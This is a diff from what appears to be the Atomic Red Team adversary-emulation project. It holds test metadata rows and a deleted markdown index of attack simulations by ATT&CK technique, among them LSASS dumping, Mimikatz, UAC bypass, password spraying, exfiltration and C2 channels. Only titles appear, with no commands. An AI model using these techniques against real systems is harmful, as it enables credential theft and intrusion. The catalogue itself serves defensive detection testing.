521 command-and-control T1071.004 DNS 3 DNS Long Domain Query fef31710-223a-40ee-8462-a396d6b66978 powershell
522 command-and-control T1071.004 DNS 4 DNS C2 e7bf9802-2e78-4db9-93b5-181b7bcd37d7 powershell
523 command-and-control T1573 Encrypted Channel 1 OpenSSL C2 21caf58e-87ad-440c-a6b8-3ac259964003 powershell
524 command-and-control T1105 Ingress Tool Transfer 7 certutil download (urlcache) dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 command_prompt
525 command-and-control T1105 Ingress Tool Transfer 8 certutil download (verifyctl) ffd492e3-0455-4518-9fb1-46527c9f241b powershell
526 command-and-control T1105 Ingress Tool Transfer 9 Windows - BITSAdmin BITS Download a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b command_prompt
527 command-and-control T1105 Ingress Tool Transfer 10 Windows - PowerShell Download 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 powershell
528 command-and-control T1105 Ingress Tool Transfer 11 OSTAP Worming Activity 2ca61766-b456-4fcf-a35a-1233685e1cad command_prompt
529 command-and-control T1105 Ingress Tool Transfer 12 svchost writing a file to a UNC path fa5a2759-41d7-4e13-a19c-e8f28a53566f command_prompt
530 command-and-control T1105 Ingress Tool Transfer 13 Download a File with Windows Defender MpCmdRun.exe 815bef8b-bf91-4b67-be4c-abe4c2a94ccc command_prompt
531 command-and-control T1090.001 Internal Proxy 3 portproxy reg key b8223ea9-4be2-44a6-b50a-9657a3d4e72a powershell
532 command-and-control T1095 Non-Application Layer Protocol 1 ICMP C2 0268e63c-e244-42db-bef7-72a9e59fc1fc powershell
533 command-and-control T1095 Non-Application Layer Protocol 2 Netcat C2 bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 powershell
534 command-and-control T1095 Non-Application Layer Protocol 3 Powercat C2 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e powershell
535 command-and-control T1571 Non-Standard Port 1 Testing usage of uncommonly used port with PowerShell 21fe622f-8e53-4b31-ba83-6d333c2583f4 powershell
536 command-and-control T1219 Remote Access Software 1 TeamViewer Files Detected Test on Windows 8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0 powershell
537 command-and-control T1219 Remote Access Software 2 AnyDesk Files Detected Test on Windows 6b8b7391-5c0a-4f8c-baee-78d8ce0ce330 powershell
538 command-and-control T1219 Remote Access Software 3 LogMeIn Files Detected Test on Windows d03683ec-aae0-42f9-9b4c-534780e0f8e1 powershell
539 command-and-control T1132.001 Standard Encoding 2 XOR Encoded data. c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 powershell
540 command-and-control T1071.001 Web Protocols 1 Malicious User Agents - Powershell 81c13829-f6c9-45b8-85a6-053366d55297 powershell
541 command-and-control T1071.001 Web Protocols 2 Malicious User Agents - CMD dc3488b0-08c7-4fea-b585-905c83b48180 command_prompt
542 execution T1053.002 At (Windows) 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
543 execution T1559.002 Dynamic Data Exchange 1 Execute Commands f592ba2a-e9e8-4d62-a459-ef63abd819fd manual
544 execution T1559.002 Dynamic Data Exchange 2 Execute PowerShell script via Word DDE 47c21fb6-085e-4b0d-b4d2-26d72c3830b3 command_prompt
545 execution T1559.002 Dynamic Data Exchange 3 DDEAUTO cf91174c-4e74-414e-bec0-8d60a104d181 manual
546 execution T1204.002 Malicious File 1 OSTap Style Macro Execution 8bebc690-18c7-4549-bc98-210f7019efff powershell
547 execution T1204.002 Malicious File 2 OSTap Payload Download 3f3af983-118a-4fa1-85d3-ba4daa739d80 command_prompt
548 execution T1204.002 Malicious File 3 Maldoc choice flags command execution 0330a5d2-a45a-4272-a9ee-e364411c4b18 powershell
549 execution T1204.002 Malicious File 4 OSTAP JS version add560ef-20d6-4011-a937-2c340f930911 powershell
550 execution T1204.002 Malicious File 5 Office launching .bat file from AppData 9215ea92-1ded-41b7-9cd6-79f9a78397aa powershell
551 execution T1204.002 Malicious File 6 Excel 4 Macro 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 powershell
552 execution T1204.002 Malicious File 7 Headless Chrome code execution via VBA a19ee671-ed98-4e9d-b19c-d1954a51585a powershell
553 execution T1204.002 Malicious File 8 Potentially Unwanted Applications (PUA) 02f35d62-9fdc-4a97-b899-a5d9a876d295 powershell
554 execution T1106 Native API 1 Execution through API - CreateProcess 99be2089-c52d-4a4a-b5c3-261ee42c8b62 command_prompt
555 execution T1059.001 PowerShell 1 Mimikatz f3132740-55bc-48c4-bcc0-758a459cd027 command_prompt
556 execution T1059.001 PowerShell 2 Run BloodHound from local disk a21bb23e-e677-4ee7-af90-6931b57b6350 powershell
557 execution T1059.001 PowerShell 3 Run Bloodhound from Memory using Download Cradle bf8c1441-4674-4dab-8e4e-39d93d08f9b7 powershell
558 execution T1059.001 PowerShell 4 Obfuscation Tests 4297c41a-8168-4138-972d-01f3ee92c804 powershell
559 execution T1059.001 PowerShell 5 Mimikatz - Cradlecraft PsSendKeys af1800cf-9f9d-4fd1-a709-14b1e6de020d powershell
560 execution T1059.001 PowerShell 6 Invoke-AppPathBypass 06a220b6-7e29-4bd8-9d07-5b4d86742372 command_prompt
561 execution T1059.001 PowerShell 7 Powershell MsXml COM object - with prompt 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da command_prompt
562 execution T1059.001 PowerShell 8 Powershell XML requests 4396927f-e503-427b-b023-31049b9b09a6 command_prompt
563 execution T1059.001 PowerShell 9 Powershell invoke mshta.exe download 8a2ad40b-12c7-4b25-8521-2737b0a415af command_prompt
564 execution T1059.001 PowerShell 10 Powershell Invoke-DownloadCradle cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 manual
565 execution T1059.001 PowerShell 11 PowerShell Fileless Script Execution fa050f5e-bc75-4230-af73-b6fd7852cd73 powershell
566 execution T1059.001 PowerShell 12 PowerShell Downgrade Attack 9148e7c4-9356-420e-a416-e896e9c0f73e powershell
567 execution T1059.001 PowerShell 13 NTFS Alternate Data Stream Access 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 powershell
568 execution T1059.001 PowerShell 14 PowerShell Session Creation and Use 7c1acec2-78fa-4305-a3e0-db2a54cddecd powershell
569 execution T1059.001 PowerShell 15 ATHPowerShellCommandLineParameter -Command parameter variations 686a9785-f99b-41d4-90df-66ed515f81d7 powershell
570 execution T1059.001 PowerShell 16 ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments 1c0a870f-dc74-49cf-9afc-eccc45e58790 powershell
571 execution T1059.001 PowerShell 17 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations 86a43bad-12e3-4e85-b97c-4d5cf25b95c3 powershell
572 execution T1059.001 PowerShell 18 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments 0d181431-ddf3-4826-8055-2dbf63ae848b powershell
573 execution T1053.005 Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
574 execution T1053.005 Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
575 execution T1053.005 Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
576 execution T1053.005 Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
577 execution T1053.005 Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
578 execution T1053.005 Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
579 execution T1569.002 Service Execution 1 Execute a Command as a Service 2382dee2-a75f-49aa-9378-f52df6ed3fb1 command_prompt
580 execution T1569.002 Service Execution 2 Use PsExec to execute a command on a remote host 873106b7-cfed-454b-8680-fa9f6400431c command_prompt
581 execution T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
582 execution T1059.005 Visual Basic 1 Visual Basic script execution to gather local computer information 1620de42-160a-4fe5-bbaf-d3fef0181ce9 powershell
583 execution T1059.005 Visual Basic 2 Encoded VBS code execution e8209d5f-e42d-45e6-9c2f-633ac4f1eefa powershell
584 execution T1059.005 Visual Basic 3 Extract Memory via VBA 8faff437-a114-4547-9a60-749652a03df6 powershell
585 execution T1059.003 Windows Command Shell 1 Create and Execute Batch Script 9e8894c0-50bd-4525-a96c-d4ac78ece388 powershell
586 execution T1059.003 Windows Command Shell 2 Writes text to a file and displays it. 127b4afe-2346-4192-815c-69042bec570e command_prompt
587 execution T1047 Windows Management Instrumentation 1 WMI Reconnaissance Users c107778c-dcf5-47c5-af2e-1d058a3df3ea command_prompt
588 execution T1047 Windows Management Instrumentation 2 WMI Reconnaissance Processes 5750aa16-0e59-4410-8b9a-8a47ca2788e2 command_prompt
589 execution T1047 Windows Management Instrumentation 3 WMI Reconnaissance Software 718aebaa-d0e0-471a-8241-c5afa69c7414 command_prompt
590 execution T1047 Windows Management Instrumentation 4 WMI Reconnaissance List Remote Services 0fd48ef7-d890-4e93-a533-f7dedd5191d3 command_prompt
591 execution T1047 Windows Management Instrumentation 5 WMI Execute Local Process b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 command_prompt
592 execution T1047 Windows Management Instrumentation 6 WMI Execute Remote Process 9c8ef159-c666-472f-9874-90c8d60d136b command_prompt
593 execution T1047 Windows Management Instrumentation 7 Create a Process using WMI Query and an Encoded Command 7db7a7f9-9531-4840-9b30-46220135441c command_prompt
594 execution T1047 Windows Management Instrumentation 8 Create a Process using obfuscated Win32_Process 10447c83-fc38-462a-a936-5102363b1c43 powershell
595 exfiltration T1020 Automated Exfiltration 1 IcedID Botnet HTTP PUT 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0 powershell
596 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 2 Exfiltration Over Alternative Protocol - ICMP dd4b4421-2e25-4593-90ae-7021947ad12e powershell
597 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 4 Exfiltration Over Alternative Protocol - HTTP 6aa58451-1121-4490-a8e9-1dada3f1c68c powershell
598 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 5 Exfiltration Over Alternative Protocol - SMTP ec3a835e-adca-4c7c-88d2-853b69c11bb9 powershell
599 lateral-movement T1021.003 Distributed Component Object Model 1 PowerShell Lateral Movement using MMC20 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 powershell
600 lateral-movement T1550.002 Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
601 lateral-movement T1550.002 Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
602 lateral-movement T1550.003 Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
603 lateral-movement T1563.002 RDP Hijacking 1 RDP hijacking a37ac520-b911-458e-8aed-c5f1576d9f46 command_prompt
604 lateral-movement T1021.001 Remote Desktop Protocol 1 RDP to DomainController 355d4632-8cb9-449d-91ce-b566d0253d3e powershell
605 lateral-movement T1021.001 Remote Desktop Protocol 2 RDP to Server 7382a43e-f19c-46be-8f09-5c63af7d3e2b powershell
606 lateral-movement T1021.002 SMB/Windows Admin Shares 1 Map admin share 3386975b-367a-4fbb-9d77-4dcf3639ffd3 command_prompt
607 lateral-movement T1021.002 SMB/Windows Admin Shares 2 Map Admin Share PowerShell 514e9cd7-9207-4882-98b1-c8f791bae3c5 powershell
608 lateral-movement T1021.002 SMB/Windows Admin Shares 3 Copy and Execute File with PsExec 0eb03d41-79e4-4393-8e57-6344856be1cf command_prompt
609 lateral-movement T1021.002 SMB/Windows Admin Shares 4 Execute command writing output to local Admin Share d41aaab5-bdfe-431d-a3d5-c29e9136ff46 command_prompt
610 lateral-movement T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
611 lateral-movement T1021.006 Windows Remote Management 1 Enable Windows Remote Management 9059e8de-3d7d-4954-a322-46161880b9cf powershell
612 lateral-movement T1021.006 Windows Remote Management 2 Invoke-Command 5295bd61-bd7e-4744-9d52-85962a4cf2d6 powershell
613 lateral-movement T1021.006 Windows Remote Management 3 WinRM Access with Evil-WinRM efe86d95-44c4-4509-ae42-7bfd9d1f5b3d powershell
614 initial-access T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
615 initial-access T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
616 initial-access T1078.003 Local Accounts 1 Create local account with admin priviliges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
617 initial-access T1566.001 Spearphishing Attachment 1 Download Phishing Attachment - VBScript 114ccff9-ae6d-4547-9ead-4cd69f687306 powershell
618 initial-access T1566.001 Spearphishing Attachment 2 Word spawned a command shell and used an IP address in the command line cbb6799a-425c-4f83-9194-5447a909d67f powershell
atomics/Indexes/Indexes-Markdown/index.md
-1653
View File
@@ -1,1653 +0,0 @@
# All Atomic Tests by ATT&CK Tactic & Technique
# credential-access
- [T1003.008 /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md)
- Atomic Test #1: Access /etc/shadow (Local) [linux]
- Atomic Test #2: Access /etc/passwd (Local) [linux]
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1558.004 AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.003 Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1552.005 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.007 Container API](../../T1552.007/T1552.007.md)
- Atomic Test #1: ListSecrets [macos, linux]
- Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux]
- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #1: SSH Credential Stuffing From Linux [linux]
- Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #2: Extract passwords with grep [macos, linux]
- Atomic Test #3: Extracting passwords with findstr [windows]
- Atomic Test #4: Access unattend.xml [windows]
- Atomic Test #5: Find and Access Github Credentials [macos, linux]
- [T1555 Credentials from Password Stores](../../T1555/T1555.md)
- Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
- Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
- Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #2: Search macOS Safari Cookies [macos]
- Atomic Test #3: LaZagne - Credentials from Browser [windows]
- [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
- [T1003.006 DCSync](../../T1003.006/T1003.006.md)
- Atomic Test #1: DCSync (Active Directory) [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1187 Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- [T1558.001 Golden Ticket](../../T1558.001/T1558.001.md)
- Atomic Test #1: Crafting Active Directory golden tickets with mimikatz [windows]
- [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md)
- Atomic Test #1: GPP Passwords (findstr) [windows]
- Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1558.003 Kerberoasting](../../T1558.003/T1558.003.md)
- Atomic Test #1: Request for service tickets [windows]
- [T1555.001 Keychain](../../T1555.001/T1555.001.md)
- Atomic Test #1: Keychain [macos]
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md)
- Atomic Test #1: Dumping LSA Secrets [windows]
- [T1003.001 LSASS Memory](../../T1003.001/T1003.001.md)
- Atomic Test #1: Windows Credential Editor [windows]
- Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows]
- Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows]
- Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
- Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
- Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
- Atomic Test #7: LSASS read with pypykatz [windows]
- Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
- Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
- Atomic Test #10: Powershell Mimikatz [windows]
- Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
- Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
- Atomic Test #1: Create Volume Shadow Copy with vssadmin [windows]
- Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
- Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
- Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
- Atomic Test #5: Create Volume Shadow Copy with Powershell [windows]
- Atomic Test #6: Create Symlink to Volume Shadow Copy [windows]
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux [linux]
- Atomic Test #2: Packet Capture macOS [macos]
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Gsecdump [windows]
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
- Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
- [T1110.002 Password Cracking](../../T1110.002/T1110.002.md)
- Atomic Test #1: Password Cracking with Hashcat [windows]
- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #1: Brute Force Credentials of all Active Directory domain users via SMB [windows]
- Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #1: Password Spray all Domain Users [windows]
- Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
- Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #1: Private Keys [windows]
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
- Atomic Test #1: Dump individual process memory with sh (Local) [linux]
- Atomic Test #2: Dump individual process memory with Python (Local) [linux]
- T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
- Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
- Atomic Test #2: Registry parse with pypykatz [windows]
- Atomic Test #3: esentutl.exe SAM copy [windows]
- Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1555.004 Windows Credential Manager [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# collection
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1560 Archive Collected Data](../../T1560/T1560.md)
- Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1560.002 Archive via Library](../../T1560.002/T1560.002.md)
- Atomic Test #1: Compressing data using GZip in Python (Linux) [linux]
- Atomic Test #2: Compressing data using bz2 in Python (Linux) [linux]
- Atomic Test #3: Compressing data using zipfile in Python (Linux) [linux]
- Atomic Test #4: Compressing data using tarfile in Python (Linux) [linux]
- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #1: Compress Data for Exfiltration With Rar [windows]
- Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
- [T1123 Audio Capture](../../T1123/T1123.md)
- Atomic Test #1: using device audio capture commandlet [windows]
- [T1119 Automated Collection](../../T1119/T1119.md)
- Atomic Test #1: Automated Collection Command Prompt [windows]
- Atomic Test #2: Automated Collection PowerShell [windows]
- Atomic Test #3: Recon information for export with PowerShell [windows]
- Atomic Test #4: Recon information for export with Command Prompt [windows]
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
- Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows]
- Atomic Test #3: Execute commands from clipboard [macos]
- Atomic Test #4: Collect Clipboard Data via VBA [windows]
- T1213.001 Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1602 Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- Atomic Test #2: PowerShell - Prompt User for Password [windows]
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #1: Stage data from Discovery.bat [windows]
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
- [T1114.001 Local Email Collection](../../T1114.001/T1114.001.md)
- Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1602.002 Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1602.001 SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #1: Screencapture [macos]
- Atomic Test #2: Screencapture (silent) [macos]
- Atomic Test #3: X Windows Capture [linux]
- Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
- Atomic Test #5: Windows Screencapture [windows]
- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# privilege-escalation
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
- [T1546.011 Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- [T1055.004 Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
- Atomic Test #1: At - Schedule a job [linux]
- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
